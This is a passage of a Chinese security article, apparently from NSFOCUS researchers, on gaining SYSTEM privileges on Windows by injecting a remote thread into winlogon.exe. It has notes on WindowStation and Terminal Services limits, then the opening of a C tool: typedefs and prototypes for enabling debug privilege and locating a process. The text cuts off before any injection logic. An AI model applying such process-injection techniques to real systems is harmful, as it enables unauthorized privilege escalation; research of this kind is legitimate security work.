远程线程注入版获取SYSTEM权

远程线程注入版获取SYSTEM权

 

 

前段时间写〈〈exploit系列(6)--x86/Windows平台上的缓冲区溢出〉〉，其间涉及远程

线程注入，想到本篇，返回来补充一点内容。sysproc_now.c并不具备良好的可移植

性，为了区分2000/XP/2003，被迫用GetVersionEx()做精确的OS版本判断。相较之下

远程线程注入更易移植些。 

如果试图向winlogon.exe进行远程线程注入，编程时需要指定恰当的WindowStation，

否则可能无法与派生的子进程正常交互。

 

在MSDN中查看GetProcessWindowStation、GetUserObjectInformation等相关函数。

 

参看Inside 2K([7])第五章的"Interactive Services"小节。

 

使用终端服务测试CreateRemoteThread_1.c时，可能得到如下错误信息:

 

"CreateRemoteThread() failed: 存储空间不足，无法处理此命令"

 

在主控台上测试则一切正常。开始以为是WindowStation的问题，转而动态获取其名

称，错误信息依旧。后来才想起MSDN中有如下信息:

 

Terminal Services isolates each terminal session by design. Therefore, 

CreateRemoteThread fails if the target process is in a different session

than the calling process.

 

暂不清楚是否有办法解决，如果没有办法解决，那sysproc_now.c还有存在的必要。

 

--------------------------------------------------------------------------

/*

* Copyright (C) 2002, 2012

* The NSFOCUS INFORMATION TECHNOLOGY CO.,LTD.

* -----------------------------------------------------------------------

* Author : NSFocus Security Team 〈security@nsfocus.com〉

* : http://www.nsfocus.com

* Maintain : scz 〈scz@nsfocus.com〉

* Version : 2.02

* Compile : For x86/EWindows XP SP1 & VC 7

* : cl CreateRemoteThread_1.c /nologo /Os /G6 /Gs65536 /W3 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /MT /link /RELEASE

* :

* Create : 2003-10-08 13:37

* Modify : 2003-10-08 17:02

* -----------------------------------------------------------------------

* The only thing they cant take from us are our minds. !H

*/

 

/************************************************************************

* *

* Head File *

* *

************************************************************************/

 

#include 〈stdio.h〉

#include 〈stdlib.h〉

#include 〈string.h〉

#include 〈windows.h〉

 

/************************************************************************

* *

* Macro *

* *

************************************************************************/

 

#pragma comment( linker, "/INCREMENTAL:NO" )

#pragma comment( linker, "/subsystem:console" )

#pragma comment( lib, "kernel32.lib" )

#pragma comment( lib, "advapi32.lib" )

 

#define VERSION "2.02"

#define MAXBUFLEN 8192

#define CHARBASE A

#define CHARESCAPE _

#define CHARXOR ^

 

typedef LONG NTSTATUS;

 

#define NT_SUCCESS(status) ((NTSTATUS)(status)〉=0)

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

 

typedef LONG KPRIORITY;

 

typedef struct _UNICODE_STRING

{

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

 

typedef enum _SYSTEM_INFORMATION_CLASS

{

SystemProcessesAndThreadsInformation = 5

} SYSTEM_INFORMATION_CLASS;

 

typedef struct _SYSTEM_PROCESSES

{

ULONG NextEntryDelta;

ULONG ThreadCount;

ULONG Reserved1[6];

LARGE_INTEGER CreateTime;

LARGE_INTEGER UserTime;

LARGE_INTEGER KernelTime;

UNICODE_STRING ProcessName;

KPRIORITY BasePriority;

ULONG ProcessId;

ULONG InheritedFromProcessId;

} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;

 

typedef ULONG ( __stdcall *RTLNTSTATUSTODOSERROR ) ( IN NTSTATUS Status );

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL );

 

/************************************************************************

* *

* Function Prototype *

* *

************************************************************************/

 

static size_t bufencode

(

unsigned char *src,

unsigned char *dst,

size_t srclen

);

static BOOL DisableCurrentProcessDebugPrivilege

(

void

);

static BOOL EnableCurrentProcessDebugPrivilege

(

void

);

static DWORD GetPidFromProcessName

(

wchar_t *ProcessName

);

static BOOL Loc